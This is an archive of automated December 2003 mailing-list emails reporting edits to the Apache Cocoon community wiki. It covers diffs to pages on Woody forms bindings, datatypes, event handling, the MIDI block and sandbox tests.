should let you do it the old fashioned way. + Note that in the manifest file there is a large list of the cocoon libs. This is necessary for deployment as a packaged war on many application servers. Its recommended you just append your manifest entries to the file given. Anything not on the list above you can feel free to trash. This structure will leave you will all of the capability of cocoon but nothing being used. Its a point at which to start from. In the sitemap file, you can delete all the pipelines and action sets. Some actions pertaining to particular samples, such as the database actions for the employee sample, can also be removed. Read the sitemap file carefully. Don't be too distressed if you delete something an need it later, you can always refer back to the original distribution to recreate it. + + In the future there may be a skeletal distribution such as I have shown here. It is on the rather lengthy "to do" list for the cocoon developers. Until then, this should let you do it the old fashioned way. From [email protected] Mon Dec 15 03:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88464 invoked from network); 15 Dec 2003 03:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 15 Dec 2003 03:00:16 -0000 Received: (qmail 15879 invoked by uid 500); 15 Dec 2003 02:59:58 -0000 Delivered-To: [email protected] Received: (qmail 15737 invoked by uid 500); 15 Dec 2003 02:59:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15726 invoked from network); 15 Dec 2003 02:59:56 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 15 Dec 2003 02:59:56 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBF304p07944 for <[email protected]>; Mon, 15 Dec 2003 04:00:05 +0100 Date: Mon, 15 Dec 2003 04:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] SandBox Mon Dec 15 04:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=SandBox , version: 207 on Mon Dec 15 03:00:33 2003 by 161.129.204.104 - (But don't spill the sand all over please - see [DeadPages]). - - Play here until you are confident; it is not easy - . - \\__HINT:__ use the ''Preview'' button rather than ''Save''. - \\__Help:__ Each edit page has a help reminder section below (you may need to scroll down to see this syntax). - - Dirty links usually don't live long here. From [email protected] Mon Dec 15 04:00:14 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2616 invoked from network); 15 Dec 2003 04:00:14 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 15 Dec 2003 04:00:14 -0000 Received: (qmail 50001 invoked by uid 500); 15 Dec 2003 03:59:54 -0000 Delivered-To: [email protected] Received: (qmail 49973 invoked by uid 500); 15 Dec 2003 03:59:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49962 invoked from network); 15 Dec 2003 03:59:54 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 15 Dec 2003 03:59:54 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBF402p08326 for <[email protected]>; Mon, 15 Dec 2003 05:00:03 +0100 Date: Mon, 15 Dec 2003 05:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] SandBox Mon Dec 15 05:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=SandBox , version: 208 on Mon Dec 15 03:21:50 2003 by DavidCrossley + (But don't spill the sand all over please - see [DeadPages]). + + Play here until you are confident, it is easy. + \\__HINT:__ use the ''Preview'' button rather than ''Save''. + \\__Help:__ Each edit page has a help reminder section below (you may need to scroll down to see this syntax). + + Dirty links usually don't live long here. From [email protected] Mon Dec 15 08:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87803 invoked from network); 15 Dec 2003 08:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 15 Dec 2003 08:00:15 -0000 Received: (qmail 90830 invoked by uid 500); 15 Dec 2003 07:59:51 -0000 Delivered-To: [email protected] Received: (qmail 90806 invoked by uid 500); 15 Dec 2003 07:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90792 invoked from network); 15 Dec 2003 07:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 15 Dec 2003 07:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBF802p08422 for <[email protected]>; Mon, 15 Dec 2003 09:00:02 +0100 Date: Mon, 15 Dec 2003 09:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WyonaAccessController Mon Dec 15 09:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WyonaAccessController , version: 2 on Mon Dec 15 08:07:09 2003 by 161.129.204.104 From [email protected] Mon Dec 15 09:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21750 invoked from network); 15 Dec 2003 09:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 15 Dec 2003 09:00:16 -0000 Received: (qmail 43291 invoked by uid 500); 15 Dec 2003 08:59:51 -0000 Delivered-To: [email protected] Received: (qmail 43273 invoked by uid 500); 15 Dec 2003 08:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43258 invoked from network); 15 Dec 2003 08:59:50 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 15 Dec 2003 08:59:50 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBF902p08449 for <[email protected]>; Mon, 15 Dec 2003 10:00:02 +0100 Date: Mon, 15 Dec 2003 10:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WyonaAccessController Mon Dec 15 10:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WyonaAccessController , version: 2 on Mon Dec 15 08:07:09 2003 by 161.129.204.104 From [email protected] Tue Dec 16 12:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74928 invoked from network); 16 Dec 2003 12:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 16 Dec 2003 12:00:13 -0000 Received: (qmail 2958 invoked by uid 500); 16 Dec 2003 12:00:05 -0000 Delivered-To: [email protected] Received: (qmail 2918 invoked by uid 500); 16 Dec 2003 12:00:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 2836 invoked from network); 16 Dec 2003 12:00:04 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 16 Dec 2003 12:00:04 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBGC02O02567 for <[email protected]>; Tue, 16 Dec 2003 13:00:03 +0100 Date: Tue, 16 Dec 2003 13:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WoodyDatatypeReference Tue Dec 16 13:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WoodyDatatypeReference , version: 7 on Tue Dec 16 11:44:29 2003 by AntonioGallardo - ||Woody Datatype||Java class||Convertors|| ? -- + ||Woody Datatype||Java class||Convertors - |string|{{java.lang.String}}|Strings obviously don't support any convertors, since there's no purpose in converting a string to a string.| ? - + |string|{{java.lang.String}}|Strings obviously don't support any convertors, since there's no purpose in converting a string to a string. - |decimal|{{java.math.BigDecimal}}|formatting (decimal), plain| ? - + |decimal|{{java.math.BigDecimal}}|formatting (decimal), plain - |integer|{{java.lang.Integer}}|similar as decimal datatype| ? - + |integer|{{java.lang.Integer}}|similar as decimal datatype - |long|{{java.lang.Long}}|similar as decimal datatype| ? - + |long|{{java.lang.Long}}|similar as decimal datatype From [email protected] Tue Dec 16 13:00:06 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 111 invoked from network); 16 Dec 2003 13:00:06 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 16 Dec 2003 13:00:06 -0000 Received: (qmail 79876 invoked by uid 500); 16 Dec 2003 13:00:03 -0000 Delivered-To: [email protected] Received: (qmail 79853 invoked by uid 500); 16 Dec 2003 13:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79842 invoked from network); 16 Dec 2003 13:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 16 Dec 2003 13:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBGD02O02602 for <[email protected]>; Tue, 16 Dec 2003 14:00:02 +0100 Date: Tue, 16 Dec 2003 14:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] MarkLeicester Tue Dec 16 14:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=MarkLeicester , version: 5 on Tue Dec 16 13:09:09 2003 by MarkLeicester - !Mark Leicester + !!!Mark Leicester ? ++ + I am responsible for taking a MIDI to XMidi convertor (written by Peter Loeb) and creating an XMidiGenerator, XMidiSerializer and also some stylesheets for MIDI manipulation (inversion and transposition). For more about this see the [MIDI block|MIDI]. + From [email protected] Tue Dec 16 14:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29776 invoked from network); 16 Dec 2003 14:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 16 Dec 2003 14:00:16 -0000 Received: (qmail 56579 invoked by uid 500); 16 Dec 2003 14:00:04 -0000 Delivered-To: [email protected] Received: (qmail 56537 invoked by uid 500); 16 Dec 2003 14:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56482 invoked from network); 16 Dec 2003 14:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 16 Dec 2003 14:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBGE03O02651 for <[email protected]>; Tue, 16 Dec 2003 15:00:03 +0100 Date: Tue, 16 Dec 2003 15:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] MarkLeicester MIDI Tue Dec 16 15:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=MarkLeicester , version: 5 on Tue Dec 16 13:09:09 2003 by MarkLeicester - !Mark Leicester + !!!Mark Leicester ? ++ + I am responsible for taking a MIDI to XMidi convertor (written by Peter Loeb) and creating an XMidiGenerator, XMidiSerializer and also some stylesheets for MIDI manipulation (inversion and transposition). For more about this see the [MIDI block|MIDI]. + Page: http://wiki.cocoondev.org/Wiki.jsp?page=MIDI , version: 11 on Tue Dec 16 13:16:16 2003 by MarkLeicester - To use the XMidiGenerator in your own pipelines just specify the location of the MIDI file in the {{src}} attribute of the {{<map:generate>}} element. To serialize the XMidi back to MIDI just use the serializer in the normal way. The following pipeline generates a SAX stream representation in XMidi, and then serializers it back to MIDI: a round trip. I'll leave it to you to create the transformations that make this useful! ? - + To use the XMidiGenerator in your own pipelines just specify the location of the MIDI file in the {{src}} attribute of the {{<map:generate>}} element. To serialize the XMidi back to MIDI just use the serializer in the normal way. The following pipeline generates a SAX stream representation in XMidi, and then serializes it back to MIDI: a round trip. I'll leave it to you to create the transformations that make this useful! From [email protected] Tue Dec 16 16:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1114 invoked from network); 16 Dec 2003 16:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 16 Dec 2003 16:00:08 -0000 Received: (qmail 47803 invoked by uid 500); 16 Dec 2003 16:00:02 -0000 Delivered-To: [email protected] Received: (qmail 47670 invoked by uid 500); 16 Dec 2003 16:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47655 invoked from network); 16 Dec 2003 16:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 16 Dec 2003 16:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBGG03O02724 for <[email protected]>; Tue, 16 Dec 2003 17:00:03 +0100 Date: Tue, 16 Dec 2003 17:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WoodyBinding Tue Dec 16 17:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WoodyBinding , version: 22 on Tue Dec 16 15:16:56 2003 by MarcPortier + |wb:*|common settings for all bindings|direction|none + !!wb:*/@direction + All Bindings share the ability to have the two distinct actions they provide (i.e. load and save) been enabled or disabled by setting the attribute direction to one of the following values: + + ||value||load active?||save active? + |both(default)|yes|yes + |load|yes|no + |save|no|yes + + The default value 'both' for this attribute makes its use optional. + + ''NOTE: this setting replaces the @readonly attribute that was available only on selected bindings.'' + + * direction (optional) - * readonly (optional) ? ^^ -- + * direction (optional) ? ++ ^^^ + ''Note: the @readonly attribute supported in early versions of this binding has been replaced by the @direction attribute as supported now on all binding elements. '' + + + * direction (optional) + * row-path-insert (optional) + * direction (optional) + For both beans and XML documents there is an optional attribute row-path-insert which functions just like the row-path but is used for the nested on-insert-row binding (see below). By default the row-path-insert just takes the value of the row-path. By explicitely setting them different one can exploit one of the following use cases: + * (1) use xpath-predicates in the row-path (note that you can not do that on the row-path-insert) + * (2) save the inserted rows in a different target-node of the backend model. + + * direction (optional) + ''Note:'' This binding is never active in the 'load' operation, so there is no need to specify the direction="save" to protect you model from being changed during load. + - ''Attributes:'' none ? ----- + ''Attributes:'' + * direction (optional) - Deletes the current context node. + Deletes the current context node. ? ++ + + ''Note:'' This binding is never active in the 'load' operation, so there is no need to specify the direction="save" to protect you model from being changed during load. + * direction (optional) + ''Note:'' This binding is never active in the 'load' operation, so there is no need to specify the direction="save" to protect you model from being changed during load. + + * direction (optional) + + ''Note:'' This binding is never active in the 'load' operation, so there is no need to specify the direction="save" to protect you model from being changed during load. + * direction (optional) + - * read-only + * direction (optional) + + ''Notes:'' - The <wb:save-form> snippet should be ommitted if the "read-only" attribute is present. ? ^^^ -- --- - + * The <wb:save-form> snippet should be ommitted if the "direction" attribute is set to "load". ? ++ ++ ^^^ ++++++++++ + * The <wb:load-form> snippet should be ommitted if the "direction" attribute is set to "save". + * The @readonly attribute supported in early versions of this binding has been replaced by the @direction attribute as supported now on all binding elements. '' + From [email protected] Tue Dec 16 18:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67960 invoked from network); 16 Dec 2003 18:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 16 Dec 2003 18:00:09 -0000 Received: (qmail 80740 invoked by uid 500); 16 Dec 2003 18:00:01 -0000 Delivered-To: [email protected] Received: (qmail 80713 invoked by uid 500); 16 Dec 2003 18:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 80661 invoked from network); 16 Dec 2003 18:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 16 Dec 2003 18:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBGI03O02791 for <[email protected]>; Tue, 16 Dec 2003 19:00:03 +0100 Date: Tue, 16 Dec 2003 19:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Doco DavidNuescheler Tue Dec 16 19:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Doco , version: 9 on Tue Dec 16 17:45:43 2003 by 161.129.204.104 + ''How about using the hierarchical repository structure for that?? since the repository structure has to be managed somehow anyway... [DavidNuescheler]''. + + ''under the assumption that i understand the issue correctly... would the "reverse proxy" remove forrest from the picture?? reverse-proxying on the live machine certainly would make the roundtrip from the author to the live site much more responsive which should increase sexyness? do you think the apache infrastructure group will like the dependency to a dynamic (java based) system? if yes i think it might be beneficial to introduce a push based cache invalidation for mod_cache... [DavidNuescheler]''. Page: http://wiki.cocoondev.org/Wiki.jsp?page=DavidNuescheler , version: 1 on Tue Dec 16 17:32:04 2003 by 161.129.204.104 New page created: + working on content repositories therefore interested in cocoon: + + [jsr-170|http://www.jcp.org/en/jsr/detail?id=170] : content repository for java technology api + + \\David Nuescheler + \\Day Software + \\[email protected] + \\[http://www.day.com] + From [email protected] Wed Dec 17 01:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40956 invoked from network); 17 Dec 2003 01:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Dec 2003 01:00:12 -0000 Received: (qmail 17247 invoked by uid 500); 17 Dec 2003 00:59:56 -0000 Delivered-To: [email protected] Received: (qmail 17226 invoked by uid 500); 17 Dec 2003 00:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17215 invoked from network); 17 Dec 2003 00:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 17 Dec 2003 00:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBH102O02960 for <[email protected]>; Wed, 17 Dec 2003 02:00:03 +0100 Date: Wed, 17 Dec 2003 02:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WoodyEventHandling Wed Dec 17 02:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WoodyEventHandling , version: 10 on Wed Dec 17 00:39:40 2003 by 161.129.204.104 - __Note:__ ''If you're doing this from flowscript, you can access the Java Form instance by calling the method getWidget() on the flowscript form object.'' ? -- + __Note:__ ''If you're doing this from flowscript, you can access the Java Form instance by calling the method getWidget() on the flowscript form object. + eg: + {{{ + var f1h = new Packages.org.apache.cocoon.woody.event.Form1Handler(); + form.getWidget().setFormHandler( f1h ); + }}} + '' + From [email protected] Wed Dec 17 12:00:05 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20210 invoked from network); 17 Dec 2003 12:00:05 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Dec 2003 12:00:05 -0000 Received: (qmail 97532 invoked by uid 500); 17 Dec 2003 12:00:04 -0000 Delivered-To: [email protected] Received: (qmail 97417 invoked by uid 500); 17 Dec 2003 12:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97405 invoked from network); 17 Dec 2003 12:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 17 Dec 2003 12:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBHC02O03671 for <[email protected]>; Wed, 17 Dec 2003 13:00:02 +0100 Date: Wed, 17 Dec 2003 13:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Xxx Wed Dec 17 13:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Xxx , version: 1 on Wed Dec 17 11:22:53 2003 by Xxx New page created: + dfdfd + sdfds + From [email protected] Wed Dec 17 14:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77965 invoked from network); 17 Dec 2003 14:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Dec 2003 14:00:08 -0000 Received: (qmail 55170 invoked by uid 500); 17 Dec 2003 14:00:04 -0000 Delivered-To: [email protected] Received: (qmail 55140 invoked by uid 500); 17 Dec 2003 14:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55127 invoked from network); 17 Dec 2003 14:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 17 Dec 2003 14:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBHE03O03721 for <[email protected]>; Wed, 17 Dec 2003 15:00:03 +0100 Date: Wed, 17 Dec 2003 15:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Xxx DeleteMe RequestParameterSelector Wed Dec 17 15:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Xxx , version: 2 on Wed Dec 17 13:31:40 2003 by AndrewSavory - dfdfd - sdfds + Page: http://wiki.cocoondev.org/Wiki.jsp?page=DeleteMe , version: 33 on Wed Dec 17 13:32:12 2003 by AndrewSavory + * [Xxx] Page: http://wiki.cocoondev.org/Wiki.jsp?page=RequestParameterSelector , version: 11 on Wed Dec 17 13:23:24 2003 by Mfonsen + From [email protected] Thu Dec 18 11:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73306 invoked from network); 18 Dec 2003 11:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Dec 2003 11:00:17 -0000 Received: (qmail 37355 invoked by uid 500); 18 Dec 2003 10:59:49 -0000 Delivered-To: [email protected] Received: (qmail 37330 invoked by uid 500); 18 Dec 2003 10:59:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37317 invoked from network); 18 Dec 2003 10:59:49 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 18 Dec 2003 10:59:49 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBIB02O04589 for <[email protected]>; Thu, 18 Dec 2003 12:00:02 +0100 Date: Thu, 18 Dec 2003 12:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] ThePyramidModel Thu Dec 18 12:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=ThePyramidModel , version: 10 on Thu Dec 18 10:21:17 2003 by 161.129.204.104 + + Cool!!!!!How does it work?怎么工作的? + From [email protected] Thu Dec 18 12:00:05 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1307 invoked from network); 18 Dec 2003 12:00:04 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Dec 2003 12:00:04 -0000 Received: (qmail 20320 invoked by uid 500); 18 Dec 2003 12:00:04 -0000 Delivered-To: [email protected] Received: (qmail 20197 invoked by uid 500); 18 Dec 2003 12:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20178 invoked from network); 18 Dec 2003 12:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 18 Dec 2003 12:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBIC02O04618 for <[email protected]>; Thu, 18 Dec 2003 13:00:02 +0100 Date: Thu, 18 Dec 2003 13:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] ThePyramidModel Thu Dec 18 13:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=ThePyramidModel , version: 11 on Thu Dec 18 11:38:46 2003 by StavrosKounis - Cool!!!!!How does it work?怎么工作的? - From [email protected] Thu Dec 18 15:00:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2782 invoked from network); 18 Dec 2003 15:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 18 Dec 2003 15:00:07 -0000 Received: (qmail 12100 invoked by uid 500); 18 Dec 2003 15:00:02 -0000 Delivered-To: [email protected] Received: (qmail 12072 invoked by uid 500); 18 Dec 2003 15:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12060 invoked from network); 18 Dec 2003 15:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 18 Dec 2003 15:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBIF02O04712 for 